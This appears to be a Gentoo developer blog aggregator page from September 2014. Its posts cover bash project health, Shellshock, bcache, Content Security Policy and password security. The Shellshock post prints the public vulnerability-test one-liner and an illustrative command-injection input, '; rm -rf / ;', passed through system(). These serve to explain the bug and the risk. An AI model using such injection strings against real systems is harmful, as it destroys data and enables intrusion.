The health of bash was not considered good by anybody involved with it at a distribution level. It certainly was not considered good by me, as I moved to zsh years and years ago, and I have been working for over five years on getting rid of bashisms in scripts. Indeed, I have been pushing, with Roy and others, for the init scripts in Gentoo to be made completely POSIX shell compatible so that they can run with dash or with busybox — even before I was paid to do so for one of the devices I worked on.

Nowadays, the point is probably moot for many people. I think this is the most obvious positive PR for systemd I can think of: no thinking of shells any more, for the most part. Of course it's not strictly true, but it does solve most of the problems with bashisms in init scripts. And it should solve the problem of using bash as a programming language, except it doesn't always, but that's a topic for a different post.

But why were distributors, and Gentoo devs, so wary about bash, way before this happened? The answer is complicated. While bash is a GNU project and the GNU project is the poster child for Free Software, its management has always been sketchy. There is a single developer – The Maintainer, as the GNU website calls him, Chet Ramey – and the sole point of contact for him is the mailing lists. The code is released in dumps: a release tarball for each minor version, then, every time a new micro version is to be released, a new patch is posted and distributed. If you're a Gentoo user, you can see this when emerging bash: all the patches get applied one on top of the other.
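
Incidentally, the cumulative patch level shows up directly in the version string, so you can tell at a glance which of those dumps you are running:

bash --version | head -n 1    # e.g. "GNU bash, version 4.2.48(1)-release"; here 48 is the patch level
echo "$BASH_VERSION"          # the same information from inside a running shell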

There is no public SCM — yes, there is a git "repository", but it's essentially just an import of a given release tarball, with each released patch then applied on top of it as a commit. Since these patches represent a whole point release, and they may be fixing different bugs, related or not, it's definitely not as useful as having a repository where the intent shows clearly, so that you can figure out what is being done. Reviewing a proper commit-per-change repository is orders of magnitude easier than reviewing a diff between code dumps.

This is not completely unknown in the GNU sphere; glibc has had a terrible track record as well, and only recently, thanks to lots of combined efforts, is sanity being restored. This also includes fixing a bunch of security vulnerabilities found or driven into the ground by my friend Tavis.

But this behaviour is essentially why people like me and other distribution developers have been unhappy with bash for years and years: not the particular vulnerability, but the health of the project itself. I have been using zsh for years, even though I had not installed it on all my servers up to now (it's done now), and I have been pushing for Gentoo to move to /bin/sh being provided by dash for a while; Debian did it already, and the result is that the vulnerability is way less scary for them.

So yeah, I don't think it's happenstance that these issues are being found in projects that are not healthy. And it's not because they are open source, but rather because they are "open source" in a way that does not help. Yes, bash is open source, but it's not developed in the open like many other projects; it's developed behind closed doors, with only one single leader.

So remember this: be open in your open source project, it makes for better health. And try to get more people than just you involved, and review the patches you're sent publicly!

September 25, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Limiting the #shellshock fear (September 25, 2014, 20:11 UTC)

Today's news all over the place has to do with the nasty bash vulnerability that has been disclosed and now makes everybody go insane. But around this, there's more buzz than actual fire. The problem I think is that there are a number of claims around this vulnerability that are true all by themselves, but become hysteria when mashed together. Tip of the hat to SANS that tried to calm down the situation as well.

Yes, the bug is nasty, and yes, the bug can lead to remote code execution; but not all the servers in the world are vulnerable. First of all, not all the UNIX systems out there use bash at all: the BSDs don't have bash installed by default, for instance, and both Debian and Ubuntu have been defaulting to dash for their default shell for years. This is important because the mere presence of bash does not make a system vulnerable. To be exploitable, on the server side, you need at least one of two things: a bash-based CGI script, or /bin/sh being bash. In the former case it becomes obvious: you pass down the CGI variables with the exploit and you have direct remote code execution. In the latter, things are a tad less obvious, and rely on the way system() is implemented in C and other languages: it invokes /bin/sh -c {thestring}.
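
As an aside, the widely circulated one-liner to check whether a given bash build is affected by the original issue looks like this; an unpatched bash prints "vulnerable", a fixed one only prints the test line (possibly with a warning about the function definition):

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"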

Using system() is already a red flag for me in lots of server-side software: input sanitization is essential in that situation, as otherwise passing user-provided strings to a system() call makes it trivial to achieve remote code execution. Think of software using system("convert %s %s-thumb.png") with a user-provided string, and let the user provide ; rm -rf / ; as their input… can you see the problem? But with this particular bash bug, you don't need user-supplied strings to be passed to system(); the mere call will cause the environment to be copied over and thus the code to be executed. But this relies on /bin/sh being bash, which is not the case for the BSDs, Debian, Ubuntu and a bunch of other situations. And it also requires the user to be able to control an environment variable.

This does not mean that there is absolutely no risk for Debian or Ubuntu users (or even FreeBSD, but that's a different problem): if you control an environment variable, and somehow the web application invokes (even indirectly) a bash script (through system() or otherwise), then you're also vulnerable. This can be the case if the invoked script has #!/bin/bash explicitly in it. Funnily enough, this is how most clients are vulnerable to this problem: the ISC DHCP client dhclient uses a helper script called dhclient-script to set some special options it receives from the server; at least in the Debian/Ubuntu packages of it, the script uses #!/bin/bash explicitly, making those systems vulnerable even if their default shell is not bash.
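
A quick, rough way to spot scripts on a system that explicitly request bash rather than /bin/sh is to grep for the shebang; the directories below are only examples, adjust them to your own layout:

grep -rls '^#!/bin/bash' /etc/init.d /sbin /usr/sbin 2>/dev/null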

But who seriously uses CGI nowadays in production? Turns out that a bunch of people using WordPress do, to run PHP — and I'm sure there are scripts using system(). If this is a nail in the coffin of something, my opinion is that it should be in the coffin of the self-hosting mantra that people still insist on.

On the other hand, the focus of the tech field right now is CGI running in small devices, like routers, TVs, and so on and so forth. It is indeed the case that the majority of those devices implement their web interfaces through CGI, because it's simple and proven, and does not require complex web servers such as Apache. This is what scared plenty of tech people, but it's a scare that has not been researched properly either. While it's true that most of my small devices use CGI, I don't think any of them uses bash. In the embedded world, the majority of the people out there wouldn't go near bash with a ten-foot pole: it's slow, it's big, and it's clunky. If you're building an embedded image, you probably already have busybox around, and you may as well use it as your shell. It also allows you to use the in-process version of most commands without requiring a full fork.

It's easy to see how you go from A to Z here: "bash makes CGI vulnerable" and "nearly all embedded devices use CGI" become "bash makes nearly all embedded devices vulnerable". But that's not true; as SANS points out, only a minimal part of the devices out there is actually vulnerable to this attack. Which does not mean the attack is irrelevant. It's important, and it should tell us many things.

I'll be writing again regarding "project health" and talking a bit more about bash as a project. In the mean time, make sure you update, don't believe the first news of "all fixed" (as Tavis pointed out, the first fix was not thought out properly), and make sure you don't self-host the stuff you want to keep out of the cloud on a server you upgrade once a year.

Conferencing (September 25, 2014, 18:57 UTC)

This past weekend I had the honor of hosting the VideoLAN Dev Days 2014 in Dublin, in the headquarters of my employer. This is the first time I have organized a conference (or rather helped organize one; Audrey and our staff did most of the heavy lifting), and I made a number of mistakes, but I think I can learn from them and do better the next time I try something like this.

_MG_8424.jpg
Photo credit: me

Organizing an event in Dublin has some interesting and not-obvious drawbacks, one of which is the need for a proper visa for people who reside in Europe but are not EEA citizens, thanks to the fact that Ireland is not part of Schengen. I was expecting at least UK residents not to need any scrutiny, but Derek proved me wrong, as he had to get an (easy) visa on entry.

Getting just shy of a hundred people together in a city like Dublin, which is by far not a metropolis like Paris or London, is an interesting exercise: yes, we had the space for the conference itself, but finding hotels and restaurants for that many people became tricky. A very positive shout-out is due to Yamamori Sushi, which hosted the whole lot of us without a fixed menu and without a hitch.

As usual, meeting in person with the people you work with in open source is a perfect way to improve collaboration — knowing how people behave face to face makes it easier to understand their behaviour online, which is especially useful if their attitudes can be a bit grating online. And given that many people, including me, are known as proponents of Troll-Driven Development – or Rant-Driven Development, given that people like Anon, redditors and 4channers have given an even worse connotation to Troll – it's really a requirement if you are really interested in being part of the community.

This time around, I was even able to stop myself from gathering too much swag! I decided not to pick up a hoodie, and leave it to people who would actually use it, although I did pick up a Gandi VLC shirt. I hope I'll be able to do that at LISA as I'm bound there too, and last year I came back with way too many shirts and other swag.

September 24, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)

Almost an entire year ago (just a few days apart) I announced my first published book, called SELinux System Administration. The book covers SELinux administration commands and focuses on Linux administrators who need to interact with SELinux-enabled systems.

An important part of SELinux was only covered very briefly in that book: policy development. So in the spring of this year, Packt approached me and asked if I was interested in authoring a second book for them, called SELinux Cookbook. This book focuses on policy development and on tuning SELinux to fit the needs of the administrator or engineer, and as such is a logical follow-up to the previous book. Of course, given my affinity with the wonderful Gentoo Linux distribution, it is mentioned in the book (and is even the reference platform), even though the book itself is checked against Red Hat Enterprise Linux and Fedora as well, ensuring that every recipe in the book works on all distributions. Luckily (or perhaps not surprisingly) the approach is quite distribution-agnostic.

Today, I got word that the SELinux Cookbook is now officially published. The book uses a recipe-based approach to SELinux development and tuning, so it gets hands-on quickly. It gives my view on SELinux policy development while keeping the methods and processes aligned with the upstream policy development project (the reference policy).

It’s been a pleasure (but also somewhat of a pain, as this is done in free time, which is scarce already) to author the book. Unlike the first book, where I struggled a bit to keep the page count to the requested amount, this book was not limited. Also, I think the various stages of the book’s development contributed well to the final result (something that I overlooked a bit the first time, so this time I re-reviewed changes over and over again – after the first editorial reviews, then after the content reviews, then after the language reviews, then after the code reviews).

You’ll see me blog a bit more about the book later (as the marketing phase is now starting) but for me, this is a major milestone which allowed me to write down more of my SELinux knowledge and experience. I hope it is as good a read for you as I hope it to be.

September 21, 2014
Luca Barbato a.k.a. lu_zero (homepage, bugs)
Outreach Program for Women (September 21, 2014, 13:49 UTC)

Libav participated in the summer edition of the OPW. We had three interns: Alexandra, Katerina and Nidhi.

Projects

The three interns had different starting skills, so the projects picked differed in breadth and scope.

Small tasks

Everybody has to start with a simple task, and they did as well. Polishing crufty code is one of the best ways to start learning how it works. In the Libav case we have plenty of spots that require extra care, and hidden bugs usually get uncovered that way.

Not so small tasks

Katerina decided to do something radical from the start and tried to use coccinelle to fix a whole class of issues in a single swoop: I’m still reviewing the patch and splitting it into smaller chunks to single out false positives. The patch itself put a spotlight on some of the most horrible code still lingering around; hopefully we’ll get to fix those parts soon =)

Demuxer rewrite

Alexandra and Katerina showed interest in specific targeted tasks; they honed their skills by reimplementing the ASF and RealMedia demuxers respectively. They even participated in the first Libav Summer Sprint in Torino and worked together with their mentor in person.

They had to dig through the specifications and figure out why some sample files behave in unexpected ways.

They are almost there and hopefully our next release will see brand new demuxers!

Jack of all trades

Libav has plenty of crufty code that requires some love, plenty of overly long files, and lots of small quirks that should be ironed out. Libav (as any other big project) needs some refactoring here and there.

Nidhi’s task was mainly focused on fixing some of those and helping others do the same by testing patches. She had to juggle many different tasks and learn about many different parts of the codebase and the toolset we use.

It might not sound as extreme as replacing ancient code with something completely new (and making it work at least as well as the former), but both kinds of tasks are fundamental to keeping the project healthy!

In closing

All the projects have been a success and we are looking forward to seeing further contributions from our new members!

Sebastian Pipping a.k.a. sping (homepage, bugs)
Designer wanted: Western pieces for Chinese chess (September 21, 2014, 12:36 UTC)

Background

Chinese chess is a lot easier to get into for non-Chinese people if, for the first few games, a horse looks like / rather than 馬/傌. Publicly available piece set graphics seem to all have one or more of the following shortcomings:

  • Raster but not vector images
  • Unclear or troublesome licensing
  • Poor aesthetics ([1], [2], [3], [4], [5], [6])
  • Lack of elephant, cannon/catapult, advisor pieces

Goal

Simplified, what I am looking for is

The resulting graphics will be published with CC0 Public Domain Dedication licensing for use to everyone. Particular use cases are use with xiangqi-setup, XBoard/WinBoard and Wikipedia.

In more detail

  • Seven pieces per party: Chariot/rook, horse, elephant, advisor, king, cannon/catapult, pawn
  • Use black “ink” only: Black pieces should be all black with parts cut out, “white”/”red” pieces  should be black outlines with body cut out (example here)
  • No two pieces should be hard to distinguish, in particular not:
    • Pawns, advisors and king
    • Elephants and horses
    • Cannons and chariots
  • Advisors should not look similar to queens in western chess
  • Flat 2D is fine. If some pieces imitate 3D, all of them should (so no flat and pseudo 3D in the same set)
  • Needs to work at small sizes. So either two sets for small and regular display or one set that works at any size.
  • Pieces should not have a circle for a background (unlike this)
  • Not too arty, not too fancy, specific rather than abstract. Clean and simple but appealing, please.
  • Chinese culture elements welcome, if you know how to use them well.

Are you interested in working on this project? Please get in touch!

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
bcache (September 21, 2014, 11:59 UTC)

My "sacrificial box", a machine reserved for any experimentation that can break stuff, has had annoyingly slow IO for a while now. I've had 3 old SATA harddisks (250GB) in a RAID5 (because I don't trust them to survive), and recently I got a cheap 64GB SSD that initially became the new rootfs.

The performance difference between the SATA disks and the SSD is quite amazing, and the difference to a proper SSD is amazing again. Just for fun: the 3-disk RAID5 writes random data at about 1.5MB/s, the crap SSD manages ~60MB/s, and a proper SSD (e.g. Intel) easily hits over 200MB/s. So while this is not great hardware it's excellent for demonstrating performance hacks.

Recent-ish kernels finally have bcache included, so I decided to see if I can make use of it. Since creating new bcache devices is destructive, I copied all data away, reformatted the relevant partitions and then set up bcache. So the SSD is now 20GB rootfs, 40GB cache. The RAID5 stays as it is, but gets reformatted with bcache.
In code:

wipefs -a /dev/md0 # erase old signatures to unconfuse bcache (without -a wipefs only lists them)
make-bcache -C /dev/sda2 -B /dev/md0 --writeback --cache_replacement_policy=lru
mkfs.xfs /dev/bcache0 # no longer using md0 directly!
Now performance is still quite meh, what's the problem? Oh ... we need to attach the SSD cache device to the backing device!
ls /sys/fs/bcache/
45088921-4709-4d30-a54d-d5a963edf018  register  register_quiet
That's the UUID we need, so:
echo 45088921-4709-4d30-a54d-d5a963edf018 > /sys/block/bcache0/bcache/attach
and dmesg says:
[  549.076506] bcache: bch_cached_dev_attach() Caching md0 as bcache0 on set 45088921-4709-4d30-a54d-d5a963edf018
Tadaah!
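
To double-check that the attach worked, the sysfs attributes of the bcache device are handy (attribute names as found on recent kernels):

cat /sys/block/bcache0/bcache/state        # "clean" or "dirty" once a cache is attached, "no cache" otherwise
cat /sys/block/bcache0/bcache/cache_mode   # lists the cache modes, with the active one in brackets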

So what about performance? Well ... without any proper benchmarks, just copying the data back I see very different behaviour. iotop shows writes happening at ~40MB/s, but as the network isn't that fast (100Mbit switch) it's only writing every ~5sec for a second.
Unpacking chromium is now CPU-limited and doesn't cause a minute-long IO storm. Responsiveness while copying data is quite excellent.

The write speed for random IO is a lot higher, reaching maybe two thirds of the SSD's native speed, but I now have 1TB of storage at that speed - for a $25 upgrade that's quite amazing.

Another interesting thing is that bcache is chunking up IO, so the harddisks are no longer making an angry purring noise with random IO, instead it's a strange chirping as they only write a few larger chunks every second. It even reduces the noise level?! Neato.

First impression: This is definitely worth setting up for new machines that require good IO performance, the only downside for me is that you need more hardware and thus a slightly bigger budget. But the speedup is "very large" even with a cheap-crap SSD that doesn't even go that fast ...

Edit: ioping, for comparison:
native sata disks:
32 requests completed in 32.8 s, 34 iops, 136.5 KiB/s
min/avg/max/mdev = 194 us / 29.3 ms / 225.6 ms / 46.4 ms

bcache-enhanced, while writing quite a bit of data:
36 requests completed in 35.9 s, 488 iops, 1.9 MiB/s
min/avg/max/mdev = 193 us / 2.0 ms / 4.4 ms / 1.2 ms


Definitely awesome!

September 19, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)
Some experience with Content Security Policy (September 19, 2014, 08:17 UTC)

I recently started playing around with Content Security Policy (CSP). CSP is a very neat feature and a good example of how to get IT security right.

The main reason CSP exists are cross site scripting vulnerabilities (XSS). Every time a malicious attacker is able to somehow inject JavaScript or other executable code into your webpage this is called an XSS. XSS vulnerabilities are amongst the most common vulnerabilities in web applications.

CSP fixes XSS for good

The approach to fix XSS in the past was to educate web developers that they need to filter or properly escape their input. The problem with this approach is that it doesn't work. Even large websites like Amazon or Ebay don't get this right. The problem, simply stated, is that there are just too many places in a complex web application to create XSS vulnerabilities. Fixing them one at a time doesn't scale.

CSP tries to fix this in a much more generic way: how can we prevent XSS from happening at all? The way to do this is to have the web server send a header which defines where JavaScript and other content (images, objects etc.) is allowed to come from. If used correctly, CSP can prevent XSS completely. The problem with CSP is that it's hard to add to an already existing project, because if you want CSP to be really secure you have to forbid inline JavaScript. That often requires large re-engineering of existing code. Preferably CSP should be part of the development process right from the beginning. If you start a web project, keep that in mind and educate your developers to use restrictive CSP before they write any code. Starting a new web page without CSP these days is irresponsible.

To play around with it I added a CSP header to my personal webpage. This was a simple target, because it's a very simple webpage. I'm essentially sure that my webpage is XSS-free because it doesn't use any untrusted input; I mainly wanted to have an easy target to do some testing. I also tried to add CSP to this blog, but that turned out to be much more complicated.

For my personal webpage this is what I did (PHP code):
header("Content-Security-Policy:default-src 'none';img-src 'self';style-src 'self';report-uri /c/");

The default policy is to accept nothing. The only things I use on my webpage are images and stylesheets and they all are located on the same webspace as the webpage itself, so I allow these two things.
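
A quick way to verify that the header is actually being delivered is to look at the response headers from the command line (replace the URL with your own site):

curl -sI https://example.org/ | grep -i '^content-security-policy'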

This is an extremely simple CSP policy. To give you an idea of what a more realistic policy looks like, this is the one from GitHub:
Content-Security-Policy: default-src *; script-src assets-cdn.github.com www.google-analytics.com collector-cdn.github.com; object-src assets-cdn.github.com; style-src 'self' 'unsafe-inline' 'unsafe-eval' assets-cdn.github.com; img-src 'self' data: assets-cdn.github.com identicons.github.com www.google-analytics.com collector.githubapp.com *.githubusercontent.com *.gravatar.com *.wp.com; media-src 'none'; frame-src 'self' render.githubusercontent.com gist.github.com www.youtube.com player.vimeo.com checkout.paypal.com; font-src assets-cdn.github.com; connect-src 'self' ghconduit.com:25035 live.github.com uploads.github.com s3.amazonaws.com

Reporting feature

You may have noticed in my CSP header line that there's a "report-uri" directive at the end. The idea is that whenever a browser blocks something via CSP it is able to report this to the webpage owner. Why should we do this? Because we still want to fix XSS issues (there are browsers with little or no CSP support; I'm looking at you, Internet Explorer), and we want to know if our policy breaks anything that is supposed to work. The way this works is that a JSON file with details is sent via a POST request to the URL given.

While this sounds really neat in theory, in practice I found it to be quite disappointing. As I said above, I'm almost certain my webpage has no XSS issues, so I shouldn't get any reports at all. However, I get lots of them and they are all false positives. The problem is browser extensions that execute things inside a webpage's context. Sometimes you can spot them (when source-file starts with "chrome-extension" or "safari-extension"), sometimes you can't (source-file will only say "data"). Sometimes this is triggered not by single extensions but by combinations of different ones (I found out that a combination of HTTPS Everywhere and Adblock for Chrome triggered a CSP warning). I'm not sure how to handle this, or whether this is something that should be reported as a bug to either the browser vendors or the extension developers.

Conclusion

If you start a web project, use CSP. If you have a web page that needs extra security, use CSP (my bank doesn't - does yours?). CSP reporting is neat, but its usefulness is limited due to too many false positives.

Then there's the bigger picture of IT security in general. Fixing single security bugs doesn't work. Why? XSS is as old as JavaScript (1995) and it's still a huge problem. An example of a similar technology is prepared statements for SQL. If you use them you won't have SQL injections. SQL injection is the second most prevalent web security problem after XSS. By using CSP and prepared statements you eliminate the two biggest issues in web security. Sounds like a good idea to me.

Buffer overflows were first documented in 1972 and they are still the source of many security issues. Fixing them for good is trickier, but it is also possible.

September 18, 2014
Michał Górny a.k.a. mgorny (homepage, bugs)
Password security in network applications (September 18, 2014, 21:16 UTC)

While we have many interesting modern authentication methods, password authentication is still the most popular choice for network applications. It’s simple, it doesn’t require any special hardware, it doesn’t discriminate anyone in particular. It just works™.

The key requirement for maintaining the security of a secret-based authentication mechanism is the secrecy of the secret (password). Therefore, it is very important for the designer of network applications to regard the safety of the password as essential and to do their best to protect it.

In particular, the developer can affect the security of the password in three ways:

  1. through the security of server-side key storage,
  2. through the security of the secret transmission,
  3. through encouraging user to follow the best practices.

I will expand on each of them in order.

Security of server-side key storage

For secret-based authentication to work, the server needs to store some kind of secret-related information. Commonly, it stores the complete user password in a database. Since this can be valuable information, it should be specially protected so that even in case of unauthorized access to the system the attacker cannot obtain it easily.

This could be achieved through the use of key derivation functions, for example. In this case, a derived key is computed from the user-provided password and used in the system. With a good design, the password could actually never leave the client’s computer — it can be converted straight to the derived key there, and the derived key may be used from that point forward. Therefore, the best that an attacker could get is the derived key, with no trivial way of obtaining the original secret.
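
As a small command-line illustration of storing only a salted, iterated hash instead of the password itself (this assumes the mkpasswd utility from the whois package; it prompts for the password and picks a random salt):

mkpasswd -m sha-512
# prints something like $6$<salt>$<hash>; that string, not the password, is what would be stored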

Another interesting possibility is restricting access to the password store. In this case, the user account used to run the application does not have read or write access to the secret database. Instead, a proxy service is used that provides necessary primitives such as:

  • authenticating the user,
  • changing user’s password,
  • and allowing user’s password reset.

It is crucial that none of those primitives can be used without proving the necessary user authorization. The service must provide no means to obtain the current password, or to set a new password without proving user authorization. For example, a password reset would have to be confirmed using an authentication token that is sent to the user’s e-mail address (note that the e-mail address must be securely stored too) directly by the password service — that is, bypassing the potentially compromised application.

Examples of such services are PAM and LDAP. In both cases, only the appropriately privileged system or network administrator has access to the password store, while every user can access the common authentication and password setting functions. In case a bug in the application serves as a backdoor to the system, the attacker does not have sufficient privileges to read the passwords.

Security of secret transmission

The authentication process and other functions that involve transmitting secrets over the network are the most security-sensitive processes in the password’s lifetime.

I think this topic has been satisfactorily described multiple times already, so I will just summarize the key points briefly:

  1. Always use secured (TLS) connection both for authentication and post-authentication operations. This has multiple advantages, including protection against eavesdropping, message tampering, replay and man-in-the-middle attacks.
  2. Use sessions to avoid having to re-authenticate on every request. However, re-authentication may be desired when accessing data crucial to security — changing e-mail address, for example.
  3. Protect the secrets as early as possible. For example, if derived key is used for authentication, prefer deriving it client-side before the request is sent. In case of webapps, this could be done using ECMAScript, for example.
  4. Use secure authentication methods if possible. For example, you can use challenge-response authentication to avoid transmitting the secret at all.
  5. Provide alternate authentication methods to reduce the use of the secret. Asymmetric key methods (such as client certificates or SSH pre-authentication) are both convenient and secure. One-time passwords can make it safer to use the application on public terminals that cannot be trusted to be free of keyloggers.
  6. Support two-factor authentication if possible. For example, you can supplement password authentication with TOTP. Preferably, use the same TOTP parameters as Google Authenticator does, effectively enabling your users to use the many existing applications designed to serve that purpose (a minimal sketch of TOTP code generation follows this list).
  7. And most importantly, never ever send the user’s password back to them or show it to them. To prevent mistakes, ask the user to type the password twice. For password recovery, generate and send a pseudorandom authorization token, and ask the user to set a new password after using it.
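
As mentioned in point 6, here is a minimal sketch of TOTP code generation (RFC 6238 with the parameters Google Authenticator uses: HMAC-SHA1, 30-second steps, 6 digits), relying only on the Python standard library; the secret shown is a made-up example:

import base64, hashlib, hmac, struct, time

def totp(secret_b32: str, timestep: int = 30, digits: int = 6) -> str:
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int(time.time()) // timestep          # moving factor
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                      # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# The shared secret is provisioned once (e.g. via a QR code); afterwards
# only short-lived 6-digit codes ever travel over the network. A real
# verifier would also accept the adjacent time steps and compare codes
# using hmac.compare_digest().
print(totp("JBSWY3DPEHPK3PXP"))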

Best practices for user management of passwords

With server-side key storage and authentication secured, the only potential weakness left is the user’s system. While the application administrator can’t — or often shouldn’t — control it, they should encourage users to follow best practices for password security.

Those practices include:

  1. Using a secure, hard-to-guess password. Including a properly working password strength meter and a few tips is a good way of encouraging this. However, as explained below, a weak password should merely trigger a warning rather than a fatal error.
  2. Using different passwords for separate applications, to reduce the damage if an attack results in one of the secrets being obtained.
  3. If the user can’t memorize the passwords, using a dedicated, encrypted key store or a secure password derivation method. Examples of the former include built-in browser and system-wide password stores, as well as dedicated applications such as KeePass. An example of the latter is Entropass, which uses a user-provided master password and a salt constructed from the site’s domain.
  4. Using the password only in response to properly authenticated requests. In particular, the application should have a clear policy when the password can be requested and how the authenticity of the application can be verified.

A key point is that all the good practices should be encouraged, and the developer should never attempt to force them. If there are any limitations on allowed passwords, they should be technical in nature and as flexible as possible.

If there is a minimum password length, it should only aim at withstanding the first round of a brute-force attack. Technically speaking, any such limitation actually reduces entropy, since the attacker can safely skip the shorter passwords. However, because the number of possibilities grows exponentially with length, this hardly matters in practice.
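
A quick back-of-the-envelope check (a sketch assuming the 95 printable ASCII characters and an 8-character minimum) shows how little the attacker gains by being able to skip the shorter passwords:

charset = 95                                        # printable ASCII
shorter = sum(charset ** k for k in range(1, 8))    # all lengths 1..7
exactly_8 = charset ** 8
print(f"{shorter / exactly_8:.2%}")                 # ~1.06%

In other words, ruling out everything below eight characters discards only about one percent of the eight-character search space, let alone the longer passwords.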

Similarly, requiring the password to contain characters from a specific set is a bad idea. While it may sound good at first, it is yet another way of reducing entropy and making the passwords more predictable. Think of the sites that require the password to contain at least one digit. How many users have passwords ending with the digit one (1), or maybe their birth year?

The worst offenders are the sites that do not support setting your own password at all, and instead force you to use a password generated by some kind of pseudo-random algorithm. Simply put, this is an open invitation to write the password down. And once written down in cleartext, the password is no longer a secret.

Setting a low upper limit on password length is not a good idea either. It is reasonable to set some technical limit, say, 255 bytes of printable ASCII characters. However, setting the limit much lower may actually reduce the strength of some users’ passwords and collide with some of the derived keys.

Lastly, the service should clearly state when it may ask for the user’s password and how to check the authenticity of the request. This can include generic instructions on TLS certificate and domain name checks. It may also include site-specific measures like user-specific images on the login form.

Having a transparent policy for security-related announcements and an information page is a good idea as well. If a site provides more than one service (e.g. e-mail accounts), the website can list certificate fingerprints for the other services. Furthermore, any certificate or IP address changes can be preceded by a GPG-signed mail announcement.

September 15, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
My thoughts on the Self-Hosting Solution (September 15, 2014, 19:38 UTC)

You probably noticed that in the (frequent) posts talking about security and passwords lately, I keep suggesting LastPass as a password manager. This is the manager that I use myself, and the reason why I came to this one is multi-faceted, but essentially I'm suggesting you use a tool that does not make it more inconvenient to maintain proper password hygiene. Because yes, you should be using different passwords, with a combination of letters, numbers and symbols, but if you have to come up with a new one every time, then things are going to be difficult and you'll just decide to use the same password over and over.

Or you'll use a method for having "unique" passwords that actually consist of a fixed part and a variable one (which is what I used for the longest time). And let's be clear, using the same base password suffixed with the name of the site you're signing up for is no protection at all the moment more than one of your passwords is discovered.

So convenience being important, because inconvenience just leads to bad security hygiene, LastPass delivers on what I need: it has autofill, so I don't have to open a terminal and run sgeps (like I used to) to get the password out of the store; it generates the password in the browser, so I don't have to open a terminal and run pwgen; it runs on my cellphone, so I can use it to fetch the password to type somewhere else; and it even auto-fills my passwords in Android apps, so I don't have to use a simple password when dealing with some random website that then matches to an app on my phone. But it also has a few good "security conveniences": you can re-encrypt your Vault with a new master password, you can use a proper OTP pad or a 2FA device to protect it further, and they have some extras such as letting you know if the email addresses you use across services are involved in an account breach.

This does not mean there are no other good password management tools; I know the names of plenty, but I just looked for one that had the features I cared about, and I went with it. I'm happy with LastPass right now. Yes, I need to trust the company and their code a fair bit, but I don't think that just being open source would gain me more trust. Being open source and audited for a long time, sure, but I don't think either way it's a dealbreaker for me. I mean, Chrome itself has a password manager, it just doesn't feel suitable for me (no generation, no obvious way to inspect the data from mobile, sometimes bad collation of URLs, and as far as I know no way to change the sync encryption password). It also requires me to have access to my Google account to get that data.

But the interesting part is how geeks will quickly suggest to just roll your own, be it using some open-source password manager, requiring an external sync system (I did that for sgeps, but it's tied to a single GPG key, so it's not easy for me having two different hardware smartcards), or even your own sync infrastructure. And this is what I really can't stand as an answer, because it solves absolutely nothing. Jürgen called it cynical last year, but I think it's even worse than that, it's hypocritical.

Roll-your-own or host-your-own are, first of all, not going to be options for the people who have no intention to learn how computer systems work — and I can't blame them, I don't want to know how my fridge or dishwasher work, I just want them working. People don't care to learn that you can get file A on computer B, but then if you change it on both while offline you'll have collisions, so now you lost one of the two changes. They either have no time, or just no interest or (but I don't think that happens often) no skill to understand that. And it's not just the random young adult that ends up registering on xtube because they have no idea what it means. Jeremy Clarkson had to learn the hard way what it means to publish your bank details to the world.

But I think it's more important to think of the amount of people who think that they have the skills and the time, and then are found lacking one or both of them. Who do you think can protect your content (and passwords) better? A big company with entire teams dedicated to security, or an average 16-year-old who thinks he can run the website's forum? — The reference here is to myself: back in 2000/2001 I used to be the forum admin for an Italian gaming community. We got hacked, multiple times, and every time it was for me a new discovery of what security is. At the time third-party forum hosting was reserved for paying customers, and the results have probably been terrible. My personal admin password matched one of my email addresses up until last week, and I know for a fact that at least one group of people got access to the password database, where the passwords were stored in plain text.

Yes, it is true that targets such as Adobe will yield many more valid email addresses and password hashes than your average forum, but as the "fake" 5M accounts should have shown you, targeting enough small fish can lead to just about the same results, if not better, as you may be lucky and stumble across two passwords for the same account, which allows you to overcome the above-mentioned similar-but-different passwords strategy. Indeed, as I noted in my previous post, Comic Book Database admitted to being the source of part of that dump, and it lists at least four thousand public users (contributors). Other sites such as MythTV Talk or PoliceAuctions.com, both also involved, have made no such statement either.

This is not just a matter of the security of the code itself, so the "many eyes" answer does not apply. It is very well possible to have a screw-up with an open source program as well, if it's misconfigured, or if a vulnerable version doesn't get updated in time because the admin just has no time. You see that all the time with WordPress and its security issues. Indeed, the reason why I don't migrate my blog to WordPress is that I won't ever have enough time for it.

I have seen people, geeks and non-geeks both, taking the easy way out too many times, blaming Apple for the nude celebrity pictures or Google for the five million accounts. It's a safe story: "the big guys don't know better", "you just should keep it off the Internet", "you should run your own!" At the end of the day, both turned out to be collections, assembled from many small cuts, either targeted or not, in part due to people's bad password hygiene (or operational security if you prefer a more geek term), and in part due to the fact that nothing is perfect.

September 13, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Make password management better (September 13, 2014, 20:13 UTC)

When I posted my previous post on accounts on Google+ I received a very interesting suggestion that I would like to bring to the attention of more people. Andrew Cooks pointed out that what LastPass (and other password managers) really need is a way to specify the password policy programmatically, rather than crowdsourcing this data as LastPass is doing right now.

There are already a number of cross-product specifications of fixed-path files used to describe parameters, such as robots.txt or sitemap.xml. While cleaning up my blog's image serving I also found that there is a rules.abe file used by the NoScript extension for Firefox. In the same spirit, one could add a new password-policy.txt file to define some parameters for the website's password policy.

Think of the minimum and maximum length of the password, which characters are allowed, whether it is case sensitive or not. These are important pieces of information that all password managers need to know, and as I said, not all websites make them clear to the user either. I'll recount two different horror stories, one from the past and one more recent, that show why this is important.

The first story is from probably almost ten years ago or so. I registered with the Italian postal service. I selected a "strong" (not really) password, 11 characters long. It was not really dictionary-based, but it was close enough if you knew my passwords' pattern. Anyway, I liked the idea of having the long password. I signed up for it, I logged back in, everything worked. Until a few months later, when I decided I wanted to fetch that particular mailbox from GMail — yes, the Italian postal service gives you an email box, no I don't want to comment further on that.

